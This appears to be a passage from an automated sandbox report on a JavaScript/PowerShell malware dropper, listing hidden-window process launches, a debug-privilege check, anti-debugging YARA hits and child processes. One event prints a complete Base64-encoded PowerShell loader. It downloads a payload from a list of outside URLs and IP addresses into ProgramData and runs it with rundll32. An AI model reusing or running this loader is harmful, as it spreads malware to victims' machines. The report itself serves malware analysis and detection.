QB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 25, 2023, 10:43 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\ProgramData\angiolithApodyterium.js" NodulationSophia coshersButlerage swearer tarsal filepath: wscript	1	1	0
ShellExecuteExW May 25, 2023, 10:43 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAYQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 25, 2023, 10:43 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\ProgramData\angiolithApodyterium.js" NodulationSophia coshersButlerage swearer tarsal
parent_process	wscript.exe	martian_process	wscript "C:\ProgramData\angiolithApodyterium.js" NodulationSophia coshersButlerage swearer tarsal
